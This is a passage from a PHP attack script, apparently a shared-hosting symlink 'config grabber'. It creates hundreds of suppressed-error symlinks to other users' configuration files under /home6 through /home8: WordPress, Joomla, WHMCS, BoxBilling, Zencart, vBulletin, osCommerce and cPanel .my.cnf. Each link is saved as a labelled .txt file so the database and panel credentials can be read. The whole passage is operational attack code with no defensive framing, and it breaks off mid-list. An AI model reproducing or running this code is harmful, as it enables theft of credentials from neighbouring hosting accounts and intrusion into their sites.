  1980. @symlink('/home6/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1981. @symlink('/home6/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1982. @symlink('/home6/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1983. @symlink('/home6/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1984. @symlink('/home6/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1985. @symlink('/home6/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1986. @symlink('/home6/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1987. @symlink('/home6/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1988. @symlink('/home6/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1989. @symlink('/home6/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1990. @symlink('/home6/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1991. @symlink('/home6/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1992. @symlink('/home6/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1993. @symlink('/home6/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1994. @symlink('/home6/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1995. @symlink('/home6/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1996. @symlink('/home6/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1997. @symlink('/home6/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1998. @symlink('/home6/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1999. @symlink('/home6/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2000. @symlink('/home6/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2001. @symlink('/home6/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2002. @symlink('/home6/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2003. @symlink('/home6/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2004. @symlink('/home6/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2005. @symlink('/home6/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2006. @symlink('/home6/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2007. @symlink('/home6/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2008. @symlink('/home6/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2009. @symlink('/home6/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2010. @symlink('/home6/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2011. @symlink('/home6/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2012. @symlink('/home6/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2013. @symlink('/home6/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2014. @symlink('/home6/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2015. @symlink('/home6/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2016. @symlink('/home6/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2017. @symlink('/home6/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2018. @symlink('/home6/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2019. @symlink('/home6/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2020. @symlink('/home6/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2021. @symlink('/home6/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2022. @symlink('/home6/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2023. @symlink('/home6/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2024. @symlink('/home6/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2025. @symlink('/home6/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2026. @symlink('/home6/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2027. @symlink('/home6/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2028. @symlink('/home6/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2029. @symlink('/home6/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2030. @symlink('/home6/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2031. @symlink('/home6/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2032. @symlink('/home6/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2033. @symlink('/home6/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2034. @symlink('/home6/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2035. @symlink('/home6/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2036. @symlink('/home6/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2037. @symlink('/home6/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2038. @symlink('/home6/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2039. @symlink('/home6/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2040. @symlink('/home6/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2041. @symlink('/home6/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2042. @symlink('/home6/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2043. @symlink('/home6/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2044. @symlink('/home6/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2045. @symlink('/home6/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2046. @symlink('/home6/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2047. @symlink('/home6/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2048.  
  2049. //home 7
  2050.  
  2051. @symlink('/home7/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2052. @symlink('/home7/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2053. @symlink('/home7/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2054. @symlink('/home7/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2055. @symlink('/home7/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2056. @symlink('/home7/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2057. @symlink('/home7/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2058. @symlink('/home7/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2059. @symlink('/home7/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2060. @symlink('/home7/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2061. @symlink('/home7/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2062. @symlink('/home7/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2063. @symlink('/home7/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2064. @symlink('/home7/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2065. @symlink('/home7/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2066. @symlink('/home7/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2067. @symlink('/home7/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2068. @symlink('/home7/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2069. @symlink('/home7/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2070. @symlink('/home7/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2071. @symlink('/home7/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2072. @symlink('/home7/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2073. @symlink('/home7/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2074. @symlink('/home7/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2075. @symlink('/home7/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2076. @symlink('/home7/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2077. @symlink('/home7/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2078. @symlink('/home7/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2079. @symlink('/home7/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2080. @symlink('/home7/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2081. @symlink('/home7/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2082. @symlink('/home7/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2083. @symlink('/home7/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2084. @symlink('/home7/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2085. @symlink('/home7/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2086. @symlink('/home7/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2087. @symlink('/home7/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2088. @symlink('/home7/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2089. @symlink('/home7/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2090. @symlink('/home7/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2091. @symlink('/home7/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2092. @symlink('/home7/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2093. @symlink('/home7/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2094. @symlink('/home7/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2095. @symlink('/home7/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2096. @symlink('/home7/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2097. @symlink('/home7/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2098. @symlink('/home7/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2099. @symlink('/home7/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2100. @symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2101. @symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2102. @symlink('/home7/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2103. @symlink('/home7/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2104. @symlink('/home7/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2105. @symlink('/home7/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2106. @symlink('/home7/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2107. @symlink('/home7/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2108. @symlink('/home7/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2109. @symlink('/home7/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2110. @symlink('/home7/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2111. @symlink('/home7/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2112. @symlink('/home7/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2113. @symlink('/home7/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2114. @symlink('/home7/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2115. @symlink('/home7/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2116. @symlink('/home7/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2117. @symlink('/home7/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2118. @symlink('/home7/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2119. @symlink('/home7/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2120. @symlink('/home7/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2121. @symlink('/home7/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2122. @symlink('/home7/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2123. @symlink('/home7/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2124. @symlink('/home7/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2125. @symlink('/home7/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2126. @symlink('/home7/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2127. @symlink('/home7/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2128. @symlink('/home7/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2129. @symlink('/home7/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2130. @symlink('/home7/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2131. @symlink('/home7/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2132. @symlink('/home7/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2133. @symlink('/home7/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2134. @symlink('/home7/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2135. @symlink('/home7/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2136. @symlink('/home7/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2137. @symlink('/home7/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2138. @symlink('/home7/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2139. @symlink('/home7/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2140. @symlink('/home7/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2141. @symlink('/home7/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2142. @symlink('/home7/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2143. @symlink('/home7/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2144. @symlink('/home7/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2145. @symlink('/home7/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2146. @symlink('/home7/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2147. @symlink('/home7/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2148. @symlink('/home7/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2149. @symlink('/home7/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2150. @symlink('/home7/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2151. @symlink('/home7/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2152. @symlink('/home7/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2153. @symlink('/home7/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2154. @symlink('/home7/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2155. @symlink('/home7/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2156. @symlink('/home7/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2157. @symlink('/home7/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2158. @symlink('/home7/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2159. @symlink('/home7/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2160. @symlink('/home7/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2161. @symlink('/home7/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2162. @symlink('/home7/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2163. @symlink('/home7/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2164. @symlink('/home7/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2165. @symlink('/home7/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2166. @symlink('/home7/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2167. @symlink('/home7/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2168. @symlink('/home7/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2169. @symlink('/home7/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2170. @symlink('/home7/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2171. @symlink('/home7/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2172. @symlink('/home7/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2173. @symlink('/home7/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2174. @symlink('/home7/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2175. @symlink('/home7/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2176. @symlink('/home7/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2177. @symlink('/home7/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2178. @symlink('/home7/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2179. @symlink('/home7/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2180. @symlink('/home7/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2181. @symlink('/home7/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2182. @symlink('/home7/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2183. @symlink('/home7/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2184. @symlink('/home7/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2185. @symlink('/home7/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2186. @symlink('/home7/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2187. @symlink('/home7/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2188. @symlink('/home7/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2189. @symlink('/home7/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2190. @symlink('/home7/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2191. @symlink('/home7/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2192. @symlink('/home7/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2193. @symlink('/home7/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2194. @symlink('/home7/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2195. @symlink('/home7/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2196. @symlink('/home7/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2197. @symlink('/home7/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2198. @symlink('/home7/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2199. @symlink('/home7/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2200. @symlink('/home7/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2201. @symlink('/home7/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2202. @symlink('/home7/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2203. @symlink('/home7/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2204. @symlink('/home7/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2205. @symlink('/home7/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2206. @symlink('/home7/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2207. @symlink('/home7/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2208. @symlink('/home7/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2209. @symlink('/home7/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2210. @symlink('/home7/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2211. @symlink('/home7/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2212. @symlink('/home7/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2213. @symlink('/home7/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2214. @symlink('/home7/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2215. @symlink('/home7/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2216. @symlink('/home7/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2217. @symlink('/home7/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2218. @symlink('/home7/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2219. @symlink('/home7/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2220. @symlink('/home7/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2221. @symlink('/home7/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2222. @symlink('/home7/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2223. @symlink('/home7/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2224. @symlink('/home7/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2225. @symlink('/home7/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2226. @symlink('/home7/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2227. @symlink('/home7/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2228. @symlink('/home7/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2229. @symlink('/home7/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2230. @symlink('/home7/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2231. @symlink('/home7/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2232. @symlink('/home7/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2233.  
  2234. //home 8
  2235.  
  2236. @symlink('/home8/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2237. @symlink('/home8/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2238. @symlink('/home8/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2239. @symlink('/home8/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2240. @symlink('/home8/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2241. @symlink('/home8/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2242. @symlink('/home8/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2243. @symlink('/home8/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2244. @symlink('/home8/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2245. @symlink('/home8/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2246. @symlink('/home8/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2247. @symlink('/home8/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2248. @symlink('/home8/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2249. @symlink('/home8/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2250. @symlink('/home8/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2251. @symlink('/home8/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2252. @symlink('/home8/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2253. @symlink('/home8/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2254. @symlink('/home8/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2255. @symlink('/home8/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2256. @symlink('/home8/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2257. @symlink('/home8/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2258. @symlink('/home8/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2259. @symlink('/home8/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2260. @symlink('/home8/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2261. @symlink('/home8/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2262. @symlink('/home8/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2263. @symlink('/home8/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2264. @symlink('/home8/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2265. @symlink('/home8/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2266. @symlink('/home8/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2267. @symlink('/home8/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2268. @symlink('/home8/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2269. @symlink('/home8/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2270. @symlink('/home8/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2271. @symlink('/home8/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2272. @symlink('/home8/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2273. @symlink('/home8/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2274. @symlink('/home8/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2275. @symlink('/home8/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2276. @symlink('/home8/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2277. @symlink('/home8/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2278. @symlink('/home8/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2279. @symlink('/home8/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2280. @symlink('/home8/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2281. @symlink('/home8/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2282. @symlink('/home8/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2283. @symlink('/home8/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2284. @symlink('/home8/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2285. @symlink('/home8/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2286. @symlink('/home8/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2287. @symlink('/home8/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
